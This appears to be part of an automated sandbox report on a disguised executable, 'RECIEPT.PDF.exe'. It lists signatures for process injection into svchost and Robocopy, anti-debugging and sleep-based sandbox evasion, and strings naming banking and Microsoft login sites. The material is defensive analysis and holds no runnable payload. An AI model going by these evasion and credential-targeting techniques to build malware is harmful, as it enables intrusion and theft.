          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: RECIEPT.PDF.exeStatic file information: File size 1347819 > 1048576
          Source: Binary string: robocopy.pdb source: svchost.exe, 00000002.00000003.2636677658.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2636677658.000000000343B000.00000004.00000020.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000005.00000002.4782565140.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dgGgsACWgP.exe, 00000005.00000002.4780001115.000000000033E000.00000002.00000001.01000000.00000005.sdmp, dgGgsACWgP.exe, 00000007.00000000.2747138146.000000000033E000.00000002.00000001.01000000.00000005.sdmp
          Source: Binary string: wntdll.pdbUGP source: RECIEPT.PDF.exe, 00000000.00000003.2399256414.0000000004770000.00000004.00001000.00020000.00000000.sdmp, RECIEPT.PDF.exe, 00000000.00000003.2396868479.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2570263548.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572074015.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668157164.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668157164.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.2680538261.0000000004274000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4788296756.000000000476E000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4788296756.00000000045D0000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.2682309035.0000000004423000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RECIEPT.PDF.exe, 00000000.00000003.2399256414.0000000004770000.00000004.00001000.00020000.00000000.sdmp, RECIEPT.PDF.exe, 00000000.00000003.2396868479.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2570263548.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572074015.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668157164.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668157164.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, Robocopy.exe, 00000006.00000003.2680538261.0000000004274000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4788296756.000000000476E000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4788296756.00000000045D0000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.2682309035.0000000004423000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: robocopy.pdbGCTL source: svchost.exe, 00000002.00000003.2636677658.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2636677658.000000000343B000.00000004.00000020.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000005.00000002.4782565140.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: Robocopy.exe, 00000006.00000002.4791340165.0000000004BFC000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4781250480.0000000000735000.00000004.00000020.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000000.2747764571.000000000338C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2970976334.000000002CB2C000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: Robocopy.exe, 00000006.00000002.4791340165.0000000004BFC000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4781250480.0000000000735000.00000004.00000020.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000000.2747764571.000000000338C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2970976334.000000002CB2C000.00000004.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
          Source: RECIEPT.PDF.exeStatic PE information: real checksum: 0xa961f should be: 0x1525e7
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A8D4 pushad ; ret 2_2_0041A8D5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A974 push 48632F66h; iretd 2_2_0041A97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040212F pushad ; ret 2_2_00402135
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00422992 push esi; retn 0000h2_2_0042299A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402194 pushad ; ret 2_2_00402127
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414A89 push B8EE2311h; iretd 2_2_00414A8E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041F35D push es; iretd 2_2_0041F374
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041F363 push es; iretd 2_2_0041F374
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D30C push cs; iretd 2_2_0040D30D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403480 push eax; ret 2_2_00403482
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040ADAC push A6AA9BE4h; ret 2_2_0040AE0F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AE07 push A6AA9BE4h; ret 2_2_0040AE0F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417FBA push ebp; retf 2_2_00417FBB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A309AD push ecx; mov dword ptr [esp], ecx2_2_03A309B6
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exeCode function: 5_2_0544536A push eax; ret 5_2_0544536C
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046009AD push ecx; mov dword ptr [esp], ecx6_2_046009B6
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004F0DA9 push esp; iretd 6_2_004F0DAA
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004F105D push E870B46Ah; retf 6_2_004F1064
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004E7451 pushad ; ret 6_2_004E7452
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004E74F1 push 48632F66h; iretd 6_2_004E74F9
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004D7929 push A6AA9BE4h; ret 6_2_004D798C
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004D7984 push A6AA9BE4h; ret 6_2_004D798C
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004EBEDA push es; iretd 6_2_004EBEF1
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004EBEE0 push es; iretd 6_2_004EBEF1
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04325422 push eax; ret 6_2_04325424
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_043155CC pushad ; ret 6_2_043155DB
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_043146BA push ecx; iretd 6_2_043146D8
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_043156AC pushfd ; ret 6_2_043156AD
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04315690 push ecx; iretd 6_2_0431569A
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0431916A push edi; iretd 6_2_0431916C

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: Possible double extension: pdf.exeStatic PE information: RECIEPT.PDF.exe
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeAPI/Special instruction interceptor: Address: 3F0A2A4
          Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFEA3E2D324
          Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFEA3E2D7E4
          Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFEA3E2D944
          Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFEA3E2D504
          Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFEA3E2D544
          Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFEA3E2D1E4
          Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFEA3E30154
          Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFEA3E2DA44
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E rdtsc 2_2_03A7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401A01 sldt word ptr [eax]2_2_00401A01
          Source: C:\Windows\SysWOW64\Robocopy.exeWindow / User API: threadDelayed 2841Jump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeWindow / User API: threadDelayed 7132Jump to behavior
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87975
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeAPI coverage: 3.7 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
          Source: C:\Windows\SysWOW64\Robocopy.exeAPI coverage: 2.7 %
          Source: C:\Windows\SysWOW64\Robocopy.exe TID: 5844Thread sleep count: 2841 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exe TID: 5844Thread sleep time: -5682000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exe TID: 5844Thread sleep count: 7132 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exe TID: 5844Thread sleep time: -14264000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe TID: 6096Thread sleep time: -75000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe TID: 6096Thread sleep count: 38 > 30Jump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe TID: 6096Thread sleep time: -57000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe TID: 6096Thread sleep count: 40 > 30Jump to behavior
          Source: C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe TID: 6096Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\Robocopy.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
          Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_004EC650 FindFirstFileW,FindNextFileW,FindClose,6_2_004EC650
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
          Source: 00496llQmM.6.drBinary or memory string: interactivebrokers.comVMware20,11696508427
          Source: 00496llQmM.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
          Source: 00496llQmM.6.drBinary or memory string: outlook.office.comVMware20,11696508427s
          Source: 00496llQmM.6.drBinary or memory string: discord.comVMware20,11696508427f
          Source: 00496llQmM.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696508427
          Source: 00496llQmM.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696508427x
          Source: 00496llQmM.6.drBinary or memory string: ms.portal.azure.comVMware20,11696508427
          Source: 00496llQmM.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696508427}
          Source: 00496llQmM.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696508427u
          Source: 00496llQmM.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696508427d
          Source: 00496llQmM.6.drBinary or memory string: outlook.office365.comVMware20,11696508427t
          Source: 00496llQmM.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
          Source: 00496llQmM.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696508427
          Source: 00496llQmM.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
          Source: 00496llQmM.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
          Source: 00496llQmM.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696508427x
          Source: 00496llQmM.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
          Source: 00496llQmM.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
          Source: 00496llQmM.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696508427}
          Source: 00496llQmM.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696508427h
          Source: 00496llQmM.6.drBinary or memory string: tasks.office.comVMware20,11696508427o
          Source: 00496llQmM.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
          Source: 00496llQmM.6.drBinary or memory string: global block list test formVMware20,11696508427
          Source: firefox.exe, 0000000A.00000002.2972732770.000002226C9CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllIIC
          Source: dgGgsACWgP.exe, 00000007.00000002.4783566903.00000000014AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
          Source: 00496llQmM.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
          Source: 00496llQmM.6.drBinary or memory string: dev.azure.comVMware20,11696508427j
          Source: 00496llQmM.6.drBinary or memory string: bankofamerica.comVMware20,11696508427x
          Source: 00496llQmM.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
          Source: Robocopy.exe, 00000006.00000002.4781250480.0000000000735000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: 00496llQmM.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696508427]
          Source: 00496llQmM.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427
          Source: 00496llQmM.6.drBinary or memory string: turbotax.intuit.comVMware20,11696508427t
          Source: 00496llQmM.6.drBinary or memory string: AMC password management pageVMware20,11696508427
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-87119
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\Robocopy.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E rdtsc 2_2_03A7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417A03 LdrLoadDll,2_2_00417A03
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_03F0A570 mov eax, dword ptr fs:[00000030h]0_2_03F0A570
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_03F0A510 mov eax, dword ptr fs:[00000030h]0_2_03F0A510
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_03F08EF0 mov eax, dword ptr fs:[00000030h]0_2_03F08EF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]2_2_03A5438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]2_2_03A5438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A663FF mov eax, dword ptr fs:[00000030h]2_2_03A663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC3CD mov eax, dword ptr fs:[00000030h]2_2_03AEC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB63C0 mov eax, dword ptr fs:[00000030h]2_2_03AB63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]2_2_03ADE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]2_2_03ADE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov ecx, dword ptr fs:[00000030h]2_2_03ADE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]2_2_03ADE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]2_2_03AD43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]2_2_03AD43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C310 mov ecx, dword ptr fs:[00000030h]2_2_03A2C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50310 mov ecx, dword ptr fs:[00000030h]2_2_03A50310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD437C mov eax, dword ptr fs:[00000030h]2_2_03AD437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
